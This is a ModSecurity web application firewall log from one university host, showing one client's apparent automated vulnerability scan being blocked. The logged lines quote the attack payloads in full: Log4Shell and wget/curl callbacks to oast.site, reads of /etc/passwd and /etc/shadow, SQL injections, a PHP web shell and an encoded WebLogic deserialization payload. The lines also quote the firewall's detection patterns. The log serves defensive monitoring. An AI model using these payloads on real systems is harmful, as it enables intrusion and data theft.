[Tue Aug 29 11:34:16.344515 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEEAAAAM"]
[Tue Aug 29 11:34:16.383990 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAARdiP4AAAAK"]
[Tue Aug 29 11:34:17.395179 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASHh8EAAAAD"]
[Tue Aug 29 11:34:19.303416 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlg8agmxqzs16pz9.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAARdiQwAAAAK"]
[Tue Aug 29 11:34:19.304519 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAASI0CUAAAAG"]
[Tue Aug 29 11:34:19.358889 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAAShCXwAAAAi"]
[Tue Aug 29 11:34:21.898178 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "85.208.96.194_13a697b6c30ffc8426616729e8c141171ad52ccd"): Internal error [hostname "digilibft.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11TcCo-f0AAAShCYMAAAAi"]
[Tue Aug 29 11:34:23.229036 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASGMvgAAAAA"]
[Tue Aug 29 11:34:23.837497 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASGMv0AAAAA"]
[Tue Aug 29 11:34:25.471987 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "digilibft.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAATxvWQAAAAw"]
[Tue Aug 29 11:34:26.123705 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATxvWsAAAAw"]
[Tue Aug 29 11:34:26.338477 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgj1xwfqcrqmtby.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUB00UAAAA5"]
[Tue Aug 29 11:34:26.353805 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAULx60AAABD"]
[Tue Aug 29 11:34:27.575434 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/snippets.inc.php"] [unique_id "ZO11U8Co-f0AAATovl8AAAAt"]
[Tue Aug 29 11:34:28.067054 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibft.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAATVtREAAAAZ"]
[Tue Aug 29 11:34:29.324618 2023] [:error] [pid 1233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAATRZVYAAAAQ"]
[Tue Aug 29 11:34:29.335737 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgt4zb3oez88uz8.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAQKOu0AAAAs"]
[Tue Aug 29 11:34:29.421260 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATVtRUAAAAZ"]
[Tue Aug 29 11:34:29.531861 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgu4fm7wtn8r7dz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAATzVHIAAAAx"]
[Tue Aug 29 11:34:30.388152 2023] [:error] [pid 1256] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlg7buaqd1o54quo.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATovmIAAAAt"]
[Tue Aug 29 11:34:31.428262 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAAUDQR4AAAA7"]
[Tue Aug 29 11:34:32.328065 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAAUHKKYAAAA-"]
[Tue Aug 29 11:34:32.337602 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:query: echo md5(\\x22CVE-2020-19625\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/tests/support/stores/test_grid_filter.php"] [unique_id "ZO11WMCo-f0AAATxvXUAAAAw"]
[Tue Aug 29 11:34:33.338479 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAAPLwIsAAAAX"]
[Tue Aug 29 11:34:35.332759 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAAPLwI0AAAAX"]
[Tue Aug 29 11:34:37.388090 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUdm3AAAABS"]
[Tue Aug 29 11:34:38.308162 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgwijs8oonn479b.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATzVHkAAAAx"]
[Tue Aug 29 11:34:38.310004 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAATZp5QAAAAf"]
[Tue Aug 29 11:34:38.328300 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgjsh9pfmi1n55k.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAATavt8AAAAg"]
[Tue Aug 29 11:34:41.308826 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAAUNaj8AAABF"]
[Tue Aug 29 11:34:42.329588 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAAULx7sAAABD"]
